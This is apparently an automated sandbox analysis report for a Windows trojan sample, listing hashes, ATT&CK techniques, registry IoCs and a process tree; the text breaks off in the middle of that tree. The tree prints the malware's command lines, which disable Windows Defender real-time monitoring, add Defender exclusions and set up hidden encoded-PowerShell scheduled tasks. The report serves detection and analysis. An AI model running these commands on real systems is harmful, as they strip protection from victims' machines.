bdd701df36a6448c51261f8e622396fa7d458fe9d6b0d9b2a8fa8174a687d468

Analysis

max time kernel
143s
max time network
151s
platform
windows7_x64
resource
win7-20220901-en
resource tags

arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
submitted
02-12-2022 00:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file.exe
Size

7.3MB
MD5

3715597b2f1b41cdbadf0fb3aaf0879f
SHA1

19f083bc76e979a91fc623864e427030f10ba168
SHA256

bdd701df36a6448c51261f8e622396fa7d458fe9d6b0d9b2a8fa8174a687d468
SHA512

96ec7b0ad7a7a6b6c3365159631c9068ecdacf9c2c693f6e67d36775cbb11210cbd5e45b426c7fe45a4453a769b57d446521a5aa1e39254c62b390f68ef88417
SSDEEP

98304:91O/243CACjlaPeJ/gAVMKrOpBXigf+hQ73wTZm52IFLxoYguhBbb6rYtBEdufBe:91O/r3ZCBaPQJZriYsF52QvhB36j8Be

Score

10^/10

evasion trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe

Windows security bypass 2 TTPs 35 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\KNfLkiMphNUn = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\KNfLkiMphNUn = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ypnECPGzU = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ypnECPGzU = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\kenPgsqBLemLniqf = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\NiCWuKvvKWJgC = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\jMSgazFzqJtVbLJEjcR = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\kenPgsqBLemLniqf = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\kOgboOUMyeTU2 = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\kenPgsqBLemLniqf = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\jMSgazFzqJtVbLJEjcR = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\BBXtEIsMTiOzNlVB = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\BBXtEIsMTiOzNlVB = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\ahDQVohyzlKmkignS = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\NiCWuKvvKWJgC = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\kOgboOUMyeTU2 = "0"	conhost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\ahDQVohyzlKmkignS = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\kenPgsqBLemLniqf = "0"	reg.exe

Executes dropped EXE 3 IoCs

pid	Process
1744	Install.exe
1176	Install.exe
1612	BRJNaRE.exe

Checks BIOS information in registry 2 TTPs 1 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

Loads dropped DLL 8 IoCs

pid	Process
1064	file.exe
1744	Install.exe
1744	Install.exe
1744	Install.exe
1744	Install.exe
1176	Install.exe
1176	Install.exe
1176	Install.exe

Drops file in System32 directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	BRJNaRE.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	BRJNaRE.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	BRJNaRE.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\bnXhqWnZYPWvluXGbm.job	schtasks.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 5 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
2008	schtasks.exe
1144	schtasks.exe
1088	schtasks.exe
1876	schtasks.exe
1640	schtasks.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Modifies data under HKEY_USERS 9 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft	wscript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	wscript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	wscript.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
584	powershell.EXE
584	powershell.EXE
584	powershell.EXE
2020	powershell.EXE
2020	powershell.EXE
2020	powershell.EXE
1544	powershell.EXE
1544	powershell.EXE
1544	powershell.EXE
1000	powershell.EXE
1000	powershell.EXE
1000	powershell.EXE

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	584	powershell.EXE
Token: SeDebugPrivilege	2020	powershell.EXE
Token: SeDebugPrivilege	1544	powershell.EXE
Token: SeDebugPrivilege	1000	powershell.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1064 wrote to memory of 1744	1064	file.exe	27
PID 1064 wrote to memory of 1744	1064	file.exe	27
PID 1064 wrote to memory of 1744	1064	file.exe	27
PID 1064 wrote to memory of 1744	1064	file.exe	27
PID 1064 wrote to memory of 1744	1064	file.exe	27
PID 1064 wrote to memory of 1744	1064	file.exe	27
PID 1064 wrote to memory of 1744	1064	file.exe	27
PID 1744 wrote to memory of 1176	1744	Install.exe	28
PID 1744 wrote to memory of 1176	1744	Install.exe	28
PID 1744 wrote to memory of 1176	1744	Install.exe	28
PID 1744 wrote to memory of 1176	1744	Install.exe	28
PID 1744 wrote to memory of 1176	1744	Install.exe	28
PID 1744 wrote to memory of 1176	1744	Install.exe	28
PID 1744 wrote to memory of 1176	1744	Install.exe	28
PID 1176 wrote to memory of 1240	1176	Install.exe	30
PID 1176 wrote to memory of 1240	1176	Install.exe	30
PID 1176 wrote to memory of 1240	1176	Install.exe	30
PID 1176 wrote to memory of 1240	1176	Install.exe	30
PID 1176 wrote to memory of 1240	1176	Install.exe	30
PID 1176 wrote to memory of 1240	1176	Install.exe	30
PID 1176 wrote to memory of 1240	1176	Install.exe	30
PID 1176 wrote to memory of 1112	1176	Install.exe	32
PID 1176 wrote to memory of 1112	1176	Install.exe	32
PID 1176 wrote to memory of 1112	1176	Install.exe	32
PID 1176 wrote to memory of 1112	1176	Install.exe	32
PID 1176 wrote to memory of 1112	1176	Install.exe	32
PID 1176 wrote to memory of 1112	1176	Install.exe	32
PID 1176 wrote to memory of 1112	1176	Install.exe	32
PID 1112 wrote to memory of 1396	1112	forfiles.exe	35
PID 1112 wrote to memory of 1396	1112	forfiles.exe	35
PID 1112 wrote to memory of 1396	1112	forfiles.exe	35
PID 1112 wrote to memory of 1396	1112	forfiles.exe	35
PID 1112 wrote to memory of 1396	1112	forfiles.exe	35
PID 1112 wrote to memory of 1396	1112	forfiles.exe	35
PID 1112 wrote to memory of 1396	1112	forfiles.exe	35
PID 1240 wrote to memory of 1576	1240	forfiles.exe	34
PID 1240 wrote to memory of 1576	1240	forfiles.exe	34
PID 1240 wrote to memory of 1576	1240	forfiles.exe	34
PID 1240 wrote to memory of 1576	1240	forfiles.exe	34
PID 1240 wrote to memory of 1576	1240	forfiles.exe	34
PID 1240 wrote to memory of 1576	1240	forfiles.exe	34
PID 1240 wrote to memory of 1576	1240	forfiles.exe	34
PID 1576 wrote to memory of 1028	1576	cmd.exe	37
PID 1576 wrote to memory of 1028	1576	cmd.exe	37
PID 1576 wrote to memory of 1028	1576	cmd.exe	37
PID 1576 wrote to memory of 1028	1576	cmd.exe	37
PID 1576 wrote to memory of 1028	1576	cmd.exe	37
PID 1576 wrote to memory of 1028	1576	cmd.exe	37
PID 1576 wrote to memory of 1028	1576	cmd.exe	37
PID 1396 wrote to memory of 280	1396	cmd.exe	36
PID 1396 wrote to memory of 280	1396	cmd.exe	36
PID 1396 wrote to memory of 280	1396	cmd.exe	36
PID 1396 wrote to memory of 280	1396	cmd.exe	36
PID 1396 wrote to memory of 280	1396	cmd.exe	36
PID 1396 wrote to memory of 280	1396	cmd.exe	36
PID 1396 wrote to memory of 280	1396	cmd.exe	36
PID 1396 wrote to memory of 1060	1396	cmd.exe	39
PID 1396 wrote to memory of 1060	1396	cmd.exe	39
PID 1396 wrote to memory of 1060	1396	cmd.exe	39
PID 1396 wrote to memory of 1060	1396	cmd.exe	39
PID 1396 wrote to memory of 1060	1396	cmd.exe	39
PID 1396 wrote to memory of 1060	1396	cmd.exe	39
PID 1396 wrote to memory of 1060	1396	cmd.exe	39
PID 1576 wrote to memory of 2032	1576	cmd.exe	38

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1064
- C:\Users\Admin\AppData\Local\Temp\7zSC22.tmp\Install.exe
  .\Install.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1744
- - C:\Users\Admin\AppData\Local\Temp\7zS124A.tmp\Install.exe
    .\Install.exe /S /site_id "525403"
    3⤵
    - Executes dropped EXE
    - Checks BIOS information in registry
    - Loads dropped DLL
    - Drops file in System32 directory
    - Enumerates system info in registry
    - Suspicious use of WriteProcessMemory
    PID:1176
  - - C:\Windows\SysWOW64\forfiles.exe
      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1240
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1576
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        6⤵
        
        PID:1028
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        6⤵
        
        PID:2032
  - - C:\Windows\SysWOW64\forfiles.exe
      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1112
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1396
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        6⤵
        
        PID:280
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        6⤵
        
        PID:1060
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "gdpDGNvKa" /SC once /ST 00:03:22 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
      4⤵
      Creates scheduled task(s)
      PID:2008
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /run /I /tn "gdpDGNvKa"
      4⤵
      PID:392
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /DELETE /F /TN "gdpDGNvKa"
      4⤵
      PID:1528
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "bnXhqWnZYPWvluXGbm" /SC once /ST 00:11:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ahDQVohyzlKmkignS\RiDICJVdUnKYVhP\BRJNaRE.exe\" Rm /site_id 525403 /S" /V1 /F
      4⤵
      Drops file in Windows directory
      Creates scheduled task(s)
      PID:1144

C:\Windows\system32\taskeng.exe
taskeng.exe {E17A9D29-D905-4E65-915D-105781E02B4A} S-1-5-21-4063495947-34355257-727531523-1000:RYNKSFQE\Admin:Interactive:[1]
1⤵
PID:1864
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:584
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:2028
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2020
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:1604
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1544
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:892
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1000
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:1372

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:828

C:\Windows\system32\taskeng.exe
taskeng.exe {5B9E991F-6592-4ACC-B9D5-3827FE6C56A6} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:1596
- C:\Users\Admin\AppData\Local\Temp\ahDQVohyzlKmkignS\RiDICJVdUnKYVhP\BRJNaRE.exe
  C:\Users\Admin\AppData\Local\Temp\ahDQVohyzlKmkignS\RiDICJVdUnKYVhP\BRJNaRE.exe Rm /site_id 525403 /S
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  PID:1612
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gATAVYWBF" /SC once /ST 00:08:43 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:1088
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gATAVYWBF"
    3⤵
    PID:1748
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gATAVYWBF"
    3⤵
    PID:1816
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
    3⤵
    PID:300
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:1452
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
    3⤵
    PID:1016
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:1156
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gqbktNhqT" /SC once /ST 00:00:42 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:1876
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gqbktNhqT"
    3⤵
    PID:520
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gqbktNhqT"
    3⤵
    PID:1504
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\kenPgsqBLemLniqf" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:932
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\kenPgsqBLemLniqf" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:968
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\kenPgsqBLemLniqf" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1708
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\kenPgsqBLemLniqf" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1436
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\kenPgsqBLemLniqf" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1552
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\kenPgsqBLemLniqf" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:552
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\kenPgsqBLemLniqf" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:364
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\kenPgsqBLemLniqf" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1752
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C copy nul "C:\Windows\Temp\kenPgsqBLemLniqf\cqqsNhfs\vPcZtEQWBHNHKgsn.wsf"
    3⤵
    PID:1452
- - C:\Windows\SysWOW64\wscript.exe
    wscript "C:\Windows\Temp\kenPgsqBLemLniqf\cqqsNhfs\vPcZtEQWBHNHKgsn.wsf"
    3⤵
    - Modifies data under HKEY_USERS
    PID:1644
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KNfLkiMphNUn" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:280
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KNfLkiMphNUn" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1496
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NiCWuKvvKWJgC" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:2036
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NiCWuKvvKWJgC" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:2012
  - - C:\Windows\SysWOW64\reg.exe
